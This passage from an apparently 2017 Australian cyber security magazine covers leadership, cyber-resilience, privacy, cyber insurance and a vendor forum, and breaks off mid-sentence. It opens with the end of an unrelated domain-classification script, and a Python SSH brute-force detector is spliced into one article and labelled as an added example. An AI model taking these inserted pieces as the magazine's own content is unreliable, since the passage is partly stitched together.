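    "blog.example":  {"server": "Apache/2.4.25",
                      "last_compromised": TODAY - timedelta(days=30),
                      "background": ["cdn.example"]},
    "docs.example":  {"server": "Apache/2.4.25", "background": ["cdn.example"]},
    "forum.example": {"server": "nginx/1.12.0",
                      "last_compromised": TODAY - timedelta(days=400),
                      "background": ["analytics.example"]},
    # Third-party sites the primaries load content from.
    "ads.example":       {"server": "nginx/1.8.0"},
    "cdn.example":       {"server": "nginx/1.12.0"},
    "analytics.example": {"server": "Microsoft-IIS/7.5",
                          "last_compromised": TODAY - timedelta(days=10)},
}
PRIMARIES = ["news.example", "shop.example", "blog.example",
             "docs.example", "forum.example"]


if __name__ == "__main__":
    result = classify(CRAWL, TODAY)
    for domain in PRIMARIES:
        print(domain, result[domain])
    print("risky on own account:", risky_share(result, PRIMARIES, False))
    print("risky incl. background:", risky_share(result, PRIMARIES, True))
```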
Women in Security
From law to cyber security
With Rachael Falk, Director of Technology, Security & Strategy at .au Domain Administration Ltd
Rachael practiced as a lawyer in Australian and overseas law firms before commencing with Telstra. Moving from legal to cyber security, Rachael had several roles in Telstra Security Operations, including National Security Advisor. Now in a new executive position, Rachael has a clear remit to shape auDA's role in the cyber security ecosystem both within Australia and internationally.
ASM: How did you get into the security industry?
I have always liked solving problems and challenges and when I was at Telstra, I became more involved in data breach issues and it became clear to me that cyber security was regarded everywhere as more of an IT problem. I saw an opportunity to change this and help the business understand that cyber security was a risk that everyone from the board down should understand and manage. So, I was offered a one year secondment from Telstra Legal to Telstra Security Operations and it was a great move. Telstra hired a new CISO in 2013 who had a very strategic approach to cyber security and approached it as a business risk. Since then, I have never looked back.
ASM: How did your current position come about?
The .au Domain Authority (known as auDA) is both the regulator and the manager of the .au domain zone and it has gone through a period of transition over the last 12 months. They wanted an innovative approach to security and to play their role in Australia’s cyber security ecosystem. I had left Telstra and was enjoying a long break but the opportunity to help shape a different cyber security narrative was too hard to refuse.
ASM: What are some of the key challenges you think the industry is faced with and what difference do women in leadership roles make to meeting these challenges?
The key challenge is for leaders to understand that cyber security is a risk that can be effectively managed but the tone is set from the top.
Leaders who demonstrate that they care about customer data, invest in effective security outcomes and have thought about how they can recover from an incident are critical. I still think there is far too much reliance on a magical technology solution or on compliance frameworks to solve this issue. Compliance does not equal security and putting a whole bunch of tech toys in your SOC (Security Operations Centre) does not equal effective security. It has to be a combination of leadership, culture, good tech and awareness. I think women, no matter which industry they are in, bring diversity of thought. I see my key strength as not necessarily being female but being a former lawyer, who can think critically and can write in accessible English. So, I think we bring our backgrounds and a different perspective.
ASM: Where do you see the industry heading and are women sufficiently or increasingly being recognised and respected?
I see it heading towards, hopefully, a greater understanding that cyber security is a business risk. I think recent events have shown us that Australians are becoming more cyber aware and that they in turn should demand that anyone wanting to use and store their valuable data needs to be accountable should it be lost or stolen. All of us (me included!) want to know that our valuable data is being protected at all times. And I want to know that the boards and leadership teams of all organisations that handle valuable data care about that data and build security into all that they do. I still see far too many conference flyers with all men in the photos and the fact that this seems to not be noticed by those conference organisers astounds me. But thankfully there are great men in the industry who share these views and go out of their way to promote women into leadership roles, recognize their talent and not attend those conferences. I think women need to be confident and put themselves forward for events.
ASM: Are you an active mentor or being mentored and how important has a mentoring framework been to you?
I am a strong believer in mentoring, both for me and for what I can give to others. There is nothing better than being able to bounce an issue or problem around with someone else. It is great therapy but also broadens your perspective. There are a range of very talented women I talk to within the industry, from students right through to those working in cyber security. I see my role as bringing others through with me and, where I can, connecting them with other people in the industry or helping create opportunities for them. I also like sharing information or ideas with them. As for me being mentored, I have a panel of advisors (not sure they all know they are on my panel!) because I do often ask for advice on a particular issue or situation, but I am a strong believer in being open to different perspectives. I am very fortunate to have a wide range of people I can call on should I have an issue or question.
ASM: Do you have a particular agenda or focus that you would like to highlight?
I see great opportunity and challenges in cyber security. It is a great area to work in, although when I was admitted to practice law 20 years ago, this role didn't even exist. The importance of cyber security is a leadership issue that needs to be addressed at a board level but also filter down an organisation. I also don't mean that boards should be bombarded with what I call ‘packs & stats’, which traditionally involve lots of ‘attack’ and ‘threats’ numbers in large packs. Do that with a board or leadership team and you are in eye-glazing-over territory. Engage all leaders with stories about the impact of losing valuable data, both at a customer level and at a reputational level. You need to engage the hearts and minds so that the organisation understands that cyber security is a business essential and not an optional extra. My second point would be that diversity within the industry is key and we need to involve key men in the industry because those with strong voices pave the way for others as well.
ASM: What do you do when you're not working?
I work full time so far too much cleaning!! I enjoy cooking, reading, being with my kids (when I can get them off devices) and planning our next holiday (where no one seems to agree on any destination). I am afraid I'm not a good example of work life balance but having a good long break last year really made me appreciate the little things.
I N V I T A T I O N
EXCLUSIVE INTERPOL WORLD 2017 AUSTRALASIA POLICE & SECURITY PROFESSIONALS SINGAPORE DELEGATION INNOVATION TOUR
4-7 July 2017 | Suntec Singapore Convention and Exhibition Centre MySecurity Media is pleased to be the official and exclusive marketing agency for the region of Australia & New Zealand for INTERPOL World 2017. INTERPOL World 2017 provides a premium platform for public and private security sectors to discuss and showcase solutions to fast evolving global security challenges. The biennial exhibition and congress brings together law enforcement, government bodies, academia, international security professionals and decision making buyers to security solution providers and manufacturers. For more about the program visit - www.interpol-world.com
MySecurity Media will manage all logistics, such as flight/hotel bookings for the visiting delegation. 2015: 7,807 Visitors & Delegates 2017: 300 Exhibitors
Some of the main topics:
• IoT, cybersecurity, big data analytics
• Biometrics
• Genetic & synthetic biology
• Safe cities
• Robotics
• Unmanned/artificial intelligence
• Face recognition
PREMIUM SPONSORSHIP OF INTERPOL WORLD 2017 DELEGATION AVAILABLE:
Email: firstname.lastname@example.org
Delegate Profiles: Chiefs, Heads, Directors, Officers, Security Professionals, Security Consultants, System Integrators.
Visitor profiles: www.interpol-world.com/visiting
“We came to meet senior police leaders from other countries with a view to exchange criminal records, biometrics and fingerprints. We achieved ten new partners.” -Ian Readhead, National Police Chiefs’ Council, UK
Express interest in joining us at this exclusive event or visit www.interpol-world.com/visiting-delegation
Practical steps for building a cyber-resilient enterprise
By Ben Field, Country Manager, Fortinet Australia
Keeping your networks up and running is essential to your organisation. Without network access you can't send or receive emails, manage your financials, take online orders, work in the cloud or take care of any of the mission-critical applications that drive your business forward. You might need a comprehensive network security solution. But what you really want is business continuity. Cyber security is not an end unto itself. The raison d'être for your security ecosystem is to ensure business continuity. As such, cyber security should be viewed as a holistic system that encompasses everything from hardware and software through management oversight, network transparency, security policy reviews, staff training and constant feedback. There is no 'silver bullet' to protect your network. It takes an arsenal. The more weapons you have at your disposal, the more resilient your network – and organisation – will be. Keeping today's risks in check is referred to as 'cyber-resiliency'. Cyber-resiliency is defined as 'a systematic approach for establishing, implementing, operating, monitoring, reviewing, maintaining and improving an organisation's information security to achieve business objectives' (ISO/IEC 27000:2014). Cyber-resilience is a function of visibility. The tighter the control you have over your network – at the gateway as well as behind the firewall – the better armed your organisation will be to act fast if (and when) a security event does occur. And the best way to maintain that visibility – and protection – is to consolidate your security and network management operations under a common framework.
Cyber-resilience optimises operational management
Cyber-resilience and optimised operations go hand-in-hand. You can't separate them. They are both equally essential to maintaining business continuity. You should be able to see, via a dashboard, exactly what is happening on your network. As you monitor traffic patterns and user behaviour you can see immediately if there are any anomalies that might indicate a security event. At the same time you can ensure that you have allocated enough resources – processing power, bandwidth, etc. – to fully support your users as they go about their business. And because you are building a complete profile of network activity, you can create comprehensive reports for cost accounting, governance and compliance. This convergence of operations and security gives you more control than ever over your network and provides an unprecedented opportunity to ensure that your network operates at maximum efficiency with minimised risk.
KEY WORDS USED TO DESCRIBE CYBER RESILIENCE
The steps towards cyber-resiliency
The first step towards ensuring cyber-resiliency is to be prepared. A well-thought-out, comprehensive security policy is essential to keep your business processes turning over. Specifying a security policy is not a technical issue but a managerial imperative. Start with the desired outcome – business continuity – and then work down. If you don't have a plan, you can't set the rules or specify procedures. And that leads to confusion, cost over-runs, poor performance, gaps in your network security profile and, ultimately, lapses in your business continuity. The next phase of cyber-resiliency – again part of your security policy – is to develop responses for after a threat has been discovered. Staff, especially IT staff, should be trained on what to do if they discover an attack in progress. They need to isolate the event, repair any damage and then evaluate how the event occurred and what needs to be done to prevent a similar threat. This is part and parcel of an advanced threat protection (ATP) strategy. An incident reporting strategy is important. A crisis communications strategy needs to be in place, especially for high-profile organisations. The strategy may include which partners to notify and a media response. And if the Data Breach Notification bill passes, you'll have a statutory requirement to report not just the event but what steps you took to isolate, mitigate and repair the damage. Those that don't will face a range of penalties, including fines of $360,000 for individuals and $1.8 million for organisations. Recovery is the next stage of cyber-resiliency. Damage and threat assessments need to be completed before the system restoration. You'll need to ensure that no undetected payloads are lurking around your network, just waiting to pop up when least expected. Finally, review, improve and adapt. Data forensics – your syslogs are worth their weight in gold – can show what went wrong. A SIEM (security information and event management) solution can be handy. And, of course, any sort of predictive strategy is ideal. Subscribing to the most up-to-date threat intelligence can give you a heads-up for most threats except zero-day and highly professional directed attacks. This is where public-private partnerships (PPP) can shine. Instead of individual companies working on problem resolution alone, vendors, enterprises and governments – such as AusCERT – can work together. These combined resources can go a long way to prevent all but the most persistent cyber threats.
Fortinet's approach to cyber-resiliency
Fortinet's Security Fabric provides a framework for building cyber-resiliency into an organisation. Fortinet's pervasive network security gives network operators transparency at the granular level. Fortinet's single-pane-of-glass management dashboard console provides real-time metrics that automatically identify any anomalies inside the network or at the gateway. And once you have ascertained the scope and root cause of the event, you can take the appropriate action. As a security professional, it's your job to keep your organisation's network up and running. But you'll need the right tools to ensure cyber-resiliency and maintain business continuity. Fortinet's Security Fabric is the only pervasive security solution set that can protect your entire network at the granular level. Business continuity is the goal. And Fortinet has the means to deliver.
About the author
Ben Field, Fortinet's Australian Country Manager, has more than 15 years of professional managerial and technical experience in delivering cyber-resilient solutions via the channel and direct. With a specialty in data centres and enterprises, Ben is focussed on providing solutions that keep systems up and running.
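The "review, improve and adapt" step above rests on reading your syslogs, and the earlier response step asks staff to isolate an event before repairing it. The following Python script is an added example, not Fortinet's or the author's code: it parses a handful of constructed OpenSSH syslog lines (source addresses from the RFC 5737 documentation ranges), flags a burst of authentication failures from one source, and escalates when a successful login follows that burst, which is the kind of rule a SIEM would run to tell responders which host to isolate first. The line formats, the 5-failures-in-60-seconds threshold and the assumed log year (2017) are the example's own choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample syslog lines for this example (not taken from the article).
# Source addresses are RFC 5737 documentation ranges (TEST-NET-3 / TEST-NET-2).
SAMPLE_SYSLOG = """\
Jan 12 10:15:01 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 4422 ssh2
Jan 12 10:15:03 web01 sshd[2202]: Failed password for invalid user admin from 203.0.113.5 port 4423 ssh2
Jan 12 10:15:04 web01 sshd[2203]: Failed password for root from 203.0.113.5 port 4424 ssh2
Jan 12 10:15:06 web01 sshd[2204]: Failed password for root from 203.0.113.5 port 4425 ssh2
Jan 12 10:15:07 web01 sshd[2205]: Failed password for root from 203.0.113.5 port 4426 ssh2
Jan 12 10:15:09 web01 sshd[2206]: Accepted password for root from 203.0.113.5 port 4427 ssh2
Jan 12 10:20:11 web01 sshd[2300]: Failed password for alice from 198.51.100.7 port 5100 ssh2
Jan 12 10:20:40 web01 sshd[2301]: Accepted publickey for alice from 198.51.100.7 port 5101 ssh2
Jan 12 11:02:00 web01 CRON[2400]: (root) CMD (run-parts /etc/cron.hourly)
"""

# BSD-style syslog header: "Mon DD HH:MM:SS host proc[pid]: message"
HEADER_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[\w.-]+)\[\d+\]: (?P<msg>.*)$"
)
# OpenSSH authentication outcome lines (message format assumed for this example).
AUTH_RE = re.compile(
    r"^(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_auth_events(text, year=2017):
    """Return sshd authentication events as dicts; other lines (e.g. CRON) are skipped."""
    events = []
    for line in text.splitlines():
        header = HEADER_RE.match(line)
        if not header or header["proc"] != "sshd":
            continue
        auth = AUTH_RE.match(header["msg"])
        if not auth:
            continue
        # BSD syslog omits the year, so the caller supplies it.
        ts = datetime.strptime(f"{year} {header['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "host": header["host"], "result": auth["result"],
                       "method": auth["method"], "user": auth["user"], "src": auth["src"]})
    return events


def detect_auth_anomalies(events, threshold=5, window=timedelta(seconds=60)):
    """Flag a source with >= threshold failures inside `window` (medium), and any
    success from that source while the burst is still inside the window (high)."""
    findings = []
    recent_failures = defaultdict(list)   # src -> failure timestamps inside the window
    already_flagged = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        src = ev["src"]
        # Slide the window: keep only failures within `window` of this event.
        recent_failures[src] = [t for t in recent_failures[src] if ev["ts"] - t <= window]
        if ev["result"] == "Failed":
            recent_failures[src].append(ev["ts"])
            if len(recent_failures[src]) >= threshold and src not in already_flagged:
                already_flagged.add(src)
                findings.append({"kind": "auth_failure_burst", "severity": "medium",
                                 "src": src, "host": ev["host"],
                                 "first_seen": recent_failures[src][0],
                                 "last_seen": ev["ts"], "count": len(recent_failures[src])})
        elif len(recent_failures[src]) >= threshold:
            # A success right after a burst is a probable compromise: the response
            # team should isolate this host before any "repair" step.
            findings.append({"kind": "success_after_burst", "severity": "high",
                             "src": src, "host": ev["host"], "user": ev["user"],
                             "method": ev["method"], "at": ev["ts"],
                             "failures_before": len(recent_failures[src])})
    return findings


def analyse(text):
    """Parse syslog text and return the anomaly findings in time order."""
    return detect_auth_anomalies(parse_auth_events(text))


if __name__ == "__main__":
    for f in analyse(SAMPLE_SYSLOG):
        print(f["severity"].upper(), f["kind"], f["host"], f["src"], f.get("user", ""))
```

On the sample above the script reports one medium finding (five failures from 203.0.113.5 within six seconds) and one high finding (the root login two seconds later from the same source); alice's single typo followed by a key-based login is correctly left alone. The `first_seen`/`last_seen` fields are what an incident report needs to state when the event began, and the threshold and window are the two knobs to tune against your own baseline before relying on the rule.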
Is privacy a lost cause? "Your entire life is online. And it might be used against you. Be vigilant." - Febelfin
By Guillaume Noé, General Manager for Pirean, Australia & New Zealand
Three years following the explosive mass cyber surveillance revelations from Edward Snowden and the global privacy debate that they ignited, the release of the Snowden movie gives us an opportunity to reflect on the current state of our cyber privacy:
• How much do we care about our cyber privacy?
• What are we doing about it?
• How achievable is it to attain enough cyber privacy?
The Importance of Cyber Privacy
Cyber privacy refers to our right to understand and control what happens with our personal information online. It relies on our appreciation of what personal data of ours is stored, processed, transmitted and accessed online and whether it is managed according to the associated privacy regulations, such as the Australian Privacy Act. This also includes compliance with the privacy policies of online service providers, such as online banking services, Facebook, Skype, LinkedIn and Twitter, as well as the personal confidentiality expectations we might have of the services we use – such as sharing a family picture with a select group of people or establishing a VoIP call or video conference with one or more co-workers. Cyber privacy is no different to physical privacy and should be no less important. When we send a private letter by mail, we expect it will remain sealed and private until delivered to our intended recipient – we should have this same expectation online. However, privacy risks are significantly increased online because of the scale of access to digital information, the speed of access to information, and the scale of vulnerabilities and cyber threats. I think there is a general lack of information security and privacy awareness education amongst many cyber users. As such, the likelihood and impact of privacy breaches are significantly increased and, even more so, as we further extend the cyber world to many connected devices in our lives (the Internet of Things), we are further exposed through the information they collect, process and hence place at risk.
Cyber privacy risks are inherent to the following key trends:
1. Over-publishing personal information online, or publishing without enough control
Personal information published online, such as personal details, photos, locations and activity updates, can be used maliciously and expose people to key risks including identity theft and cyber-stalking; the more data we publish, especially with limited control, the greater the privacy risk. The risk to our privacy is perfectly shown in this amazing video featuring Dave, an alleged Belgian "psychic", revealing intimate details about random volunteers in search of clairvoyant enlightenment: https://youtu.be/F7pYHN9iC9I. Dave sources real-time intelligence from online sources, such as Facebook, on each of his subjects during his consultations. The video was part of a campaign from a Belgian financial organisation, and perfectly demonstrates how easy it is to acquire a person's personal information online. It concluded with "Your entire life is online. And it might be used against you. Be vigilant."
2. PII-thirsty technologies
The technologies we enjoy in our daily lives for both personal and professional purposes, purposes which are often jointly served on the same devices (i.e. BYOD), are consuming by design an increasing volume of personal information for the sake of functionality and security. The personal information they consume is often exported out of the devices to the cloud, creating a privacy risk that I believe to be often overlooked. There are many such examples of personalised content fed by geolocation data (e.g. local weather updates) and of identity and web access history tracking for tailored content, such as advertisements.
3. Online service providers are regularly hacked
The data we entrust to online service providers is also susceptible to being accidentally or maliciously leaked, resulting in privacy breaches impacting individuals, and on some occasions in severe consequences such as resignation, divorce and even suicide (e.g. the Ashley Madison case).
4. Government surveillance
The Snowden revelations in 2013 revealed to the world a mass government digital surveillance programme of impressive scale, which was supposedly designed with the good intent of protecting state and citizens through the sourcing of intelligence principally applied to counter-terrorism activities. The issue with the programme was the sourcing and processing of a huge amount of citizens' private and confidential information, without citizens' consent, which raises great concern about potential privacy abuses.
How much do we care about Cyber Privacy?
We are all concerned about cyber privacy, but we increasingly compromise on it for convenience and opportunity. Our understanding and control of the trade-off is questionable.
In Australia, the OAIC, which reports a total of 13.3 million internet-connected Australians by the end of June 2016, last published a privacy survey in 2013, the "2013 Community Attitudes to Privacy", which already reported at the time that:
• 1 in 3 had issues with how their personal information had been handled in the previous year.
• 3 in 4 were more concerned about sharing personal information online than in the previous survey.
• More than 60% of individuals would avoid using organisations or mobile apps over concerns about personal information handling.
In North America, the Pew survey on American Attitudes about Privacy, Security and Surveillance reported in 2015 a strong concern about the privacy issue for individuals, based on a study conducted on an American population sample. Most Americans hold strong views about the importance of privacy in their everyday lives. They believe it is important, and often "very important", that they be able to maintain privacy and confidentiality in commonplace activities of their lives, both online and offline. For instance:
• 93% of adults say that being in control of who can get information about them is important (incl. 74% "very important")
• 90% say that controlling what information is collected about them is important (incl. 65% "very important")
• 88% say it is important that they not have someone watch or listen to them without their permission (incl. 67% "very important")
In Europe, the European Commission also released a report in 2015, the Data Protection Eurobarometer, which reported similar findings. For example:
• More than eight out of ten respondents feel that they do not have complete control over their personal data.
• Two-thirds of respondents are concerned about not having complete control over the information they provide online.
• 55% say they are concerned about the recording of their behaviour via payment cards.
• 55% say they are concerned about the recording of everyday activities via mobile phone use or mobile applications.
We are certainly claiming to be concerned about our cyber privacy, but to what extent do we really care about it?
How well do we manage the Trade-off?
We routinely trade off privacy for convenience, more personalised services and opportunities, to an extent where we may not understand, and may not be able to best manage, the privacy risks we expose ourselves to.
For a start, we understand that providing personal information online is an increasing part of modern life (71% from the 2015 Data Protection Eurobarometer), and that there is no alternative other than to provide personal information if you want to obtain products or services (58% from the 2015 Data Protection Eurobarometer). For example, many professional and social opportunities are reliant on online services such as LinkedIn and Facebook. Not compromising enough on the publishing of private information could prove to be a limiting and disadvantaging factor.
We trade off privacy for more personalised online services. Telstra's research on Millennials, Mobiles and Money reports that young adults or "Millennials" (18 to 34 years old in 2014/2015) "demand speed, convenience, flexibility and customisation" from online banking services and mobile apps, where "the optimum trade-off between privacy and personalisation is changing daily".
We trade off privacy for convenience, such as for the privilege of using personal mobile devices to access corporate data. Such a privilege is increasingly subject to the deployment and operation of enterprise security agents on personal devices. For instance, I recently had 2 enterprise mobile security agents deployed on my personal mobile phone as an enforced security requirement for my enjoyment of work email and calendar access from my device. My knowledge of what those agents were doing on my device, what personal data they might be capturing and what they were doing with it was rather limited. We can also appreciate a level of trade-off for state and citizens' security purposes. However, the extent to which we can and do really appreciate the privacy risks we are trading off is really questionable.
What do we do about our Cyber Privacy?
There are options to improve the security of personal data and communications. For a start, personal data management practices can be improved through education and the application of further caution online about privacy. For example, in Australia, we can highlight the programme ThinkUKnow, which is oriented toward children's cyber safety, as one of the great initiatives sponsored by the Government and industry partners. Such programmes are growing and I hope will change behaviours over time. Technology is also available to reduce some privacy risks, such as for example (amongst many):
• VPNs for private web browsing (a myriad of service providers, but which to trust?),
• Anonymous web browsers, such as the Tor browser,
• Encryption toolkits such as PGP to protect communications such as emails,
• Applications to secure mobile communications, such as Wickr and WhatsApp (both of which have been reported to be used by leading Australian political figures), Signal, and ChatSecure, just to name a few,
• Applications positioning a more identity-centric view of privacy, such as SudoApp.
While some of those options appear to be growing in popularity, they are not in widespread use. They also offer only relative privacy protection, due to technology vulnerabilities and also the increasing pressure from some law enforcement and intelligence agencies to tap into those technologies, sometimes through backdoors that would also present a risk of exploitation by malicious parties.
Are we doing much with the options we have?
According to the 2015 Pew survey, few individuals would appear to do anything tangible to protect their cyber privacy. For instance, very few individuals would have adopted effective privacy protection measures such as encryption of their communications, thereby accepting – if not ignoring – the risk of compromise of their private communications and data.
How achievable is it to attain enough Cyber Privacy?
The Pew survey partly answers why we may not do much about better managing our privacy risks. The report refers to the following quote from some information scholars, which may well summarise the high *cost* of attaining privacy: "privacy is not something one can simply 'have,' but rather is something people seek to 'achieve' through an ongoing process of negotiation of all the ways that information flows across different contexts in daily life". The ongoing process of negotiation referred to may imply a high effort of discipline to achieve better privacy, and it may simply be too hard to achieve great cyber privacy.
We are clearly concerned about our online privacy, but we don't do much about it. We trade off privacy for the sake of convenience, opportunity and security without measuring the implications of it. Technology options exist to better manage some privacy risks, but we also don't use them much (too hard) and they are themselves subject to risks. The focus on and development of cyber safety education programmes may, however, provide the best opportunity for improvement in the longer term, especially as they start with young children. Such programmes may provide the key to achieving, in time, enough cyber privacy.
About the Author
Gui is a Cyber Security Advisor who delivers business-focused Cyber Security and Technology services. He is passionate about the issues of Security & Privacy, and the process to address them in both business and personal contexts. As the General Manager for Pirean in Australia & New Zealand, Gui leads Pirean's business development in the region with Identity and Access Management technology and services.
Information Security and the role of cyber insurance
By Tony Campbell, Editor, Australian Cyber Security Magazine
One of the latest trends in the information security marketplace is cyber insurance. Numerous companies are now offering policies and cover for a variety of different kinds of cyber incident, especially for managing the fallout from data breaches and any legal costs or fines they may need to pay once the breach goes public. But the reality of what cyber insurance can do for us is somewhat limited by what the insurance company knows about the risk, which is why it's only possible to get cover for tangible costs rather than intangibles.
What's Important to your Business?
Customer data and credit card data breaches are in the headlines every week, so the layman should be forgiven if they forgot that cybercrime was so much more multifaceted. In the middle of December, German steel conglomerate ThyssenKrupp AG provided a stark reminder that so much more is at stake than PII and CVVs and the clean-up after a cyber incident. ThyssenKrupp, worth around $14 billion (USD), disclosed that they had 'become the target of a massive cyber attack' in April 2016. When their internal computer emergency response team (CERT) discovered intruders on their network, evidence suggested the unknown threat actors had been pilfering intellectual property (IP) from their systems for at least two months. ThyssenKrupp's announcement suggested the attackers originated from somewhere in southeast Asia and that the stolen IP belonged to several of its global businesses.
Identifying and Managing Cyber Risk
It pays to remember that cybersecurity teams must have the people, processes and technology to tackle cybercrime from all aspects of the risk profile. Each of the top-level risk categories needs to be assessed, considered and managed to make sure that you've tried to protect what's most important to your organisation. Risks fall into several of these top-level categories, such as the loss of trade secrets (IP), financial loss, loss of reputation or credibility and the loss of life. Clearly, we'll see individual risks in each of these categories, depending on the means of the attackers, coupled with their motivation and intent. When you develop your risk treatment plan, you'll pick the best options to mitigate those risks, hopefully reducing them to an acceptable level where the board is happy that enough has been done. Options in your risk treatment plan are typically categorised as follows: accept the risk; reduce it using countermeasures that affect its likelihood or consequence; avoid it altogether; or transfer it to a third party, such as a partner or cyber insurance company. To reduce risk, you'll consider technical controls, such as firewalls, IPSs, endpoint security systems and protective monitoring, so that your security operations centre can investigate suspicious behaviour. Furthermore, when looking at other risks related to the threat of malicious insiders, you might introduce procedural countermeasures, such as a two-person rule for accessing sensitive systems or facilities and mandatory leave for sensitive roles, such as highly privileged systems administration staff.
Where Does Cyber Insurance Fit into the Puzzle?
Is cyber insurance a legitimate option for transferring risk that we should be recommending to our executives? If it's used wisely and not purchased to avoid doing the complex tasks related to managing an information security programme, then it certainly has a part to play. In context, the global cyber insurance market is forecast to reach $14 billion (USD) by 2022, according to Allied Market Research, so it's clearly getting legs on the international stage. Pay-outs from cyber insurance companies will help pay for clean-up costs after a breach, which can cover the costs of investigations, legal costs and even help rebuild your reputation, maybe by paying for a PR company's time or paying for privacy protection services for your customers. Nevertheless, in ThyssenKrupp's case, the impact of the loss of IP and trade secrets isn't something that is easily quantified, so it's very hard to insure against this kind of attack. Cyber insurance will help them offset the costs involved with the breach investigation and help them recoup network and system downtime costs, or those relating to interruption of normal business.
However, cyber insurance is a nascent product that underwriters still haven’t quite figured out how to quantify. There isn’t a lot of historical data that can be used to profile threats and likely scenarios of attack, especially given most companies don’t report cybercrime and even those that do don’t tend to report the full impact of the breach. Even with all the right security controls in place, once you’re a target, all bets are off. ThyssenKrupp has highlighted that the scale of modern hacking is way off the charts and that no matter how big and well-funded your security team is, you’re fighting an unwinnable battle that, at some point in the not-too-distant future, you’ll be hacked. And potentially, the only thing standing between the end of your company and you surviving the attack is an insurance policy.
| FEATURE REVIEW
// CANALYS CHANNELS FORUM – MACAU
MySecurity Media attended the Canalys Channels Partner 'Digital First' Forum in Macau in late October for the always insightful annual briefing from CEO Steve Brazier on how the APAC region is faring politically, economically and technologically. As Brazier highlighted to a sold-out delegation of over 1,000 delegates from over 530 channel partners, China is increasingly separating itself, with far different dynamics from the rest of the Asia Pacific (APAC). The South China Sea is a key risk and "you can't emphasise how important the South China Sea is… issues of security are going up and up and up." With this in mind, Asia has been late to discover the importance of security; as an example, in IT security, according to FireEye, the average time taken between a data breach and its detection in Asia is 520 days, whilst the world average is 146 days. With a host of mergers and acquisitions forming a convergent technology industry amidst ever-increasing security challenges, two of the biggest, Hewlett Packard Enterprise and Dell EMC, had a busy 2016 – one was planning a new business structure having de-merged and the other planning around a major merger – here's a snapshot into their story.
// THRIVING IN AN AGE OF DIGITAL DISRUPTION
Briefing by Peter Ryan, Chief Sales Officer, Enterprise Group, Hewlett Packard Enterprise
When you look around the world, every industry, every customer, every size, every government and the taste of consumers in every part of the world is changing dramatically. Digital transformation is happening everywhere and you have a choice – either disrupt or be disrupted. It is not an option to just sit still. What you would have seen from HPE in the last 12 months is to be very decisive about the choices we've made, to be competitive and to be successful in helping our partners and customers as they go through these transformations. After the separation with HP Inc in our spin out and merging the Enterprise Services business with CSC and the spin out of the software business with Britain's Micro Focus International – what that leaves us with is a very focused strategy around secure hybrid IT, around the intelligent edge and around the transformation services that our customers need. We view ourselves as a critical player in the eco-system that will drive transformation going forward. HPE still has over 22,000 services people within the company, still a reasonably sized workforce. But our strategy has always, unashamedly, been to partner. We're part of the open eco-system, so we're bringing our services to bear to help drive transformation but also encompass all the services from our partners, whatever size and shape of business they are.
Hybrid IT will win!
HPE has a few basic beliefs. We have a strong belief that hybrid IT will win. The way IT will be delivered will be a combination of public, private and traditional. Some people will run it themselves, some will get other people to manage it for them. Our aim there is to make hybrid IT simple.
The second belief is that there will be explosive growth at the edge. The edge for us will mean mobility and industrial IoT. We will see a lot of applications emerge there. We will power the intelligent edge. And the third platform for the strategy is that we have the ability and competence to execute the transformation required. That comes back to our service capability and the partnership eco-system. If you look at HPE going forward, it is a $28 billion company. In terms of relevance, we’re a strong global player. If we look to Asia, 80 per cent of our business goes through our channel partners. We’re number 1 or number 2 in every category that we operate in across the piece. The core software assets that we have kept are around hybrid, around the edge, around Aruba, around our server compute and hyper-converged, and this creates incredible opportunity for our channel partners. The addressable market we have between us is more than US$250 billion and we’re a US$28 billion company. So the question of relevance and opportunity is: do we have room to grow? The answer is surely we all do. From a business perspective, there is fantastic opportunity and everyone should be energised by it. The guidance we have given securities analysts is that we will have GDP-like growth; within that there is some pressure on traditional aspects of the business and then there are massively growing aspects of the business. On a worldwide basis, our Flash business grew 44% last quarter and we’re the only one of the top vendors to have grown Flash year on year over the last 10 consecutive quarters. Here in Asia we’re growing 3-4 times the market. For hybrid performance computing we’re still the leaders in this area, which is a US$11 billion addressable market growing 7-8%, and we have cemented our position with the acquisition of SGI (Silicon Graphics International). We’ve also had pockets of great growth, such as in hyper-converged and cloud computing. All of these pockets of growth give us a chance, together with our channel partners, to continue to execute real revenue, grow profits and improve cash flow, but also make revenues more sticky. One of the things we’re seeing with growth is that as consumption models change around hybrid IT, people want to pay as they go: everything as a service, as a utility. So we’re finding our HPE Financial Services business is giving our channel partners a great new stream of income and margin, but also, critically, the ability to manage the installed base in a better way. In our acquisitions, we’ve clearly said we will be looking at organic and inorganic routes. Our acquisition of Aruba, in many ways, has been a gift from the gods. It has been a fantastic driver of growth and the areas of business it is opening up for us have been phenomenal. The sales energy from the Aruba team has been fantastic and we also like the recent SGI and Docker acquisitions in similar ways. We are one of the few companies that can explore all options because we have the strong financial grounding to do it.
// EDITOR’S INTERVIEW
With Steve Wood, Vice President Asia Pacific, Aruba, a Hewlett Packard Enterprise company. Steve is the former President of Nortel in Australia, with a long history in the networking and telecommunications space, and now heads up Aruba in the APAC region.
“I’ve been in the networking business for the best part of 30 years and have been with Aruba since the time of the acquisition by HP, which then became HPE. We’ve seen great opportunity off the back of being a 13-year start-up, with the charter to bring secure mobility to life, which has been what has driven our business over the years.” With the merger into HPE, it has been great for us and allowed us to showcase our technology into many of the world’s largest accounts, which previously we were unable to access. Over the last year we’ve been operating as two entities and as of November 2016 we have been able to pull it all together, with a single operating model and a new Partner Ready program, which has picked the best of both worlds out of Aruba and the HP switching side and brings a new channel, as part of the Enterprise Group, with the partners and distributors. It has been very exciting. Our Partner Ready for Networking program is the core of our ‘go to market’ business. This means a single price list in local dollars, partners have been trained in stock keeping units for switch and wireless devices, and the businesses have been fully rationalised. So what Aruba, now with HPE, can offer into the market means we’re getting a lot of phone calls from people who want to check out what’s on offer. We’re very strong in defence, tertiary education, retail, such as Westfield malls, and the hospitality industries. Westfield uses our Aruba mobility solutions, which allow the landlords to track foot traffic right down to the half metre and then use analytics to send messages to customers and potential customers as they use the strong Wi-Fi in the mall – these concepts are creating new business models. Another example would be Levi’s Stadium, which hosts the 